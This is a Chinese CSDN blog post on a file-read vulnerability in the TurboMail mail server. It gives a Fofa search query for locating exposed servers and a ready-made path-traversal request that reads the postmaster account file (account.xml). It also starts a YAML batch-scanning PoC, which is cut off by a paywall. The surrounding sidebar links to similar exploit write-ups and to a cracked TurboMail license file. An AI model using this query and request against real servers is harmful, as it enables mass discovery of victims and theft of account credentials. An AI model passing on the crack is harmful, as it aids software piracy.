TurboMail viewfile 文件读取漏洞(含批量验证poc)

已于 2024-04-18 10:06:15 修改
阅读量21 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-18 10:05:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137909199
版权

1.简介

TurboMail邮件系统是面向企事业单位通信需求而研发的电子邮件服务器系统,系统内核采用C语言研发,严谨安全,拥有优秀的发展性.

2.Fofa

body="maintlogin.jsp" && body="/mailmain?type=logout"

3.漏洞复现

http://1.1.1.1/viewfile?type=cardpic&mbid=1&msgid=2&logtype=3&view=true&cardid=/accounts/root/postmaster&cardclass=../&filename=/account.xml

4.YAML

params: []
name: TurboMail viewfile 文件读取漏洞
set: {}
rules: []
groups:
  rules:
  - method: GET
    path: /viewfile?type=cardpic&mbi
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
TurboMail邮件服务器
07-23
资源名称:TurboMail邮件服务器工具简介:1、支持多种操作系统 支持Windows/Linux/AIX/FreeBSD/Solaris/HP-UX等多种操作系统,并针对各种系统进行个性优化,使得产品在各种操作系统下的运行最优化。 2、傻瓜式安装和维护 无论在任何操作系统下两分钟内都可以完成安装,在Unix/Linux下实现邮件系统无痛苦安装;邮件系统采用纯WEB的管理方式,脱离繁杂易错的命令 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
TurboMail 邮件服务器与微软活动目录(AD)实现用户数据同步和验证
01-30
邮件服务器 邮件系统 TurboMail 电子邮件系统
TurboMail邮件服务器.zip
07-11
1、支持多种操作系统  支持Windows/Linux/AIX/FreeBSD/Solaris/HP-UX等多种操作系统,并针对各种系统进行个性优化,使得产品在各种操作系统下的运行最优化。  2、傻瓜式安装和维护  无论在任何操作系统下两分钟内都可以完成安装,在Unix/Linux下实现邮件系统无痛苦安装;邮件系统采用纯WEB的管理方式,脱离繁杂易错的命令行管理模式。  3、内置电子邮件全文搜索引擎  对邮件标题、发件人、收件人、时间、内容、附件进行全文索引,实现邮件全文搜索。  4、高级中继功能和海外转发服务器保证全球收发  可根据设定的条件使用多个邮箱进行邮件中继,可使用海外服务器进行中转,确保用户畅通地发送邮件。  5、全面到位的邮件管理体系  对进出邮件进行监控,或对进出邮件设置审批,确保公司机密不通过邮件泄露;邮件归档,查找所有历史邮件;邮件跟踪,用户可查询发件的状态。  6、完美移动邮件支持(WAP, 短信)  随时随地用手机登陆个人邮箱,收发邮件,查看或下载附件;发送邮件时,即发送手机短信提醒收件人;自设条件,收到满足条件的邮件时短信提醒自己。  7、内置强大的多层反垃圾引擎,98%以上拦截率  九层反垃圾隔离模块:网络控制、来源分析、黑名单、灰名单、趋势分析、邮件来源判断、Spamfilter内容过滤、SpamAssassin引擎、TMSpamCheck反垃圾技术。  8、内置专业邮件反病毒引擎  内嵌著名的专业针对邮件病毒的ClamAV反病毒引擎;病毒库自动升级。
Turbomail邮件服务器_v3.9.2破解文件
07-31
1,下载V3.9.2文件 2,把注册文件拷贝到 邮件系统安装目录\conf下 3,重启邮件服务程序,安装注册成功。
TurboMail成功建设国家某某局公开邮箱
08-17
邮件服务器 邮件系统 企业邮箱 公民邮箱 turbomail
漏洞复现】TurboMail邮件系统viewfile文件读取漏洞
晚风不及你
12-27 542
TurboMail邮件系统是广州拓波软件科技有限公司研发的面向企事业单位通信需求而研发的电子邮件服务器系统。
漏洞复现-TurboMail viewfile 文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-19 534
漏洞复现-TurboMail viewfile 文件读取漏洞,附带自己写的poc脚本
2023.3.17 | Goby红队版可利用漏洞更新
m0_46699477的博客
03-17 8232
Nacos 身份认证绕过、泛微OA SQL注入、任意文件读取CVE-2023-26256、任意文件上传CVE-2022-39952、 天融信任意文件下载、命令执行漏洞、代码执行CVE-2022-27596、 路径穿越CVE-2022-48253、CVE-2023-25717、Aspera 远程代码执行CVE-2022-47986、SolarView Compact 、CVE-2023-23333、未授权访问、CVE-2022-31474、TurboMail文件读取、Apache默认密码....
内网攻击总结
m0_62008601的博客
11-26 2075
内网攻击的一些思路分享
内网渗透思路
热门推荐
Battery的博客
10-28 8万+
它是开放源代码的项目,遵循最新的J2EE规范。根据目标开展的不同业务,对应的服务器可能存在不同的网段上,分析服务器上运行的服务和进程可以推断目标使用的运维监控管理系统和安全防护系统,可以大概推断出入侵目标的 IT 运维水平和安全防护水平,在接下来的入侵考虑采用什么样的方法。从0.9版本起,Dockers在使用抽象虚拟是经由libvirt的LXC与systemd - nspawn提供界面的基础上,开始包括libcontainer函数库做为以自己的方式开始直接使用由Linux核心提供的虚拟化的设施。
渗透知识-内网渗透(详细版本)
Jian Sun_的博客
02-11 2万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
基于飞腾 D2000 8 核+ 32G DDR+板载 6 千兆电口+ 4 千兆光口高性能网络安全主板
YEYUANGEN的专栏
06-03 915
指令,加速网络数据运算,可广泛应用于边缘计算网关、入侵检测、默认采用网讯 WX1860A4+YT8521。加速引擎,支持单精度、双精度浮点运算。4-2666 内存,芯片内置国密。、网络监控、安全审计等应用领域。4-2666 内存,最大可支持。DDR4-2666MHz,采用。默认采用网讯 WX1860A4。默认采用网讯 WX1860A2。300*195mm(长*宽)路看门狗功能(CPU 内置)PCIe3.0(默认是。GPIO(可选单片机出。台处理器,支持双通道。bypass(可选)M.2 SSD,支持。
Gartner发布电信运营商应对持续变化的网络安全环境指南:现代云安全与网络安全的五大核心挑战
lurenjia404的博客
05-30 540
所有组织的云和网络都面临着高级威胁。作为网络安全的关键参与者,电信运营商的 CIO 需要了解行业面临的挑战,并了解应采用哪些解决方案来实现方法的现代化。
如何进行网络安全等级保护的合规性评估?
2301_79955948的博客
06-03 416
根据管理规范和标准规范,经营用户选择管理规定要求的信息安全产品,建设符合等级要求的信息安全设备,建立安全组织,制定和实施安全制度。以上步骤和注意事项是根据最新的网络安全等级保护合规性评估要求得出的,确保您的评估工作符合当前的法律法规和技术标准。在进行网络安全等级保护合规性评估时,应确保评估的准确性和全面性,避免遗漏重要的安全风险和脆弱点。评估后的整改措施应针对发现的问题进行针对性的改进,确保信息系统的安全性能达到预期的保护等级。评估结果应由专业的评估机构出具,并提供详细的评估报告,以便于理解和改进。
【网络安全的神秘世界】使用vulhub搭建漏洞测试靶场
weixin_54750312的博客
05-31 357
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
【网络安全的神秘世界】在win11搭建pikachu靶场
weixin_54750312的博客
05-31 770
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
网络安全渗透工具汇总
Varin
06-02 553
HackBar是一款基于浏览器的渗透测试工具,可以简化目标网站的攻击流程。它可以轻松地注入JavaScript和其他脚本,进行SQL注入、XSS攻击、各种类型的扫描等。该工具可在Firefox和Chrome等流行的浏览器中使用,并且功能非常强大和定制化。自定义请求发送:HackBar 允许用户自定义 HTTP 请求,并可以通过插件直接发送这些请求。用户可以手动构造 GET、POST、PUT、DELETE 等类型的请求,并添加自定义的 HTTP 头部、参数等信息。
【Python安全攻防】【网络安全】一、常见被动信息搜集手段
weixin_43031313的博客
05-28 1049
执行上述命令后,导入会报错(找不到Whois模块)(在PyCharm中,IDLE则未出现此问题),需要在报错处再次执行安装命令。《Python安全攻防——渗透测试实战指南》,MS08067安全实验室 编著,北京,机械工业出版社,2021年10月第1版。:用来查询域名是否已经被注册,以及注册域名的详细信息。参数host为目标的URL,返回对应的ip地址。:通过目标URL查询目标的IP地址。
2024世界技能大赛某省选拔赛“网络安全项目”B模块--数据包分析(jsp流量解密)
最新发布
Aluxian_的博客
06-05 92
A 集团的网络安全监控系统发现有恶意攻击者对集团官方网站进行攻击,并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,并分析黑客的恶意行为。3.请写出flag.png 中的flag 内容,格式:flag{…本任务素材清单:捕获的网络数据包文件(*.pcap)2.请写出黑客第一次连接之后,给fag图片加密的密码。5.请写出最后输出的flag,格式:flag{…4.请问黑客新建了一个用户,用户名是什么?请按答题卡的要求完成该部分的工作任务。1.请写出黑客第一次上传的木马的密码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值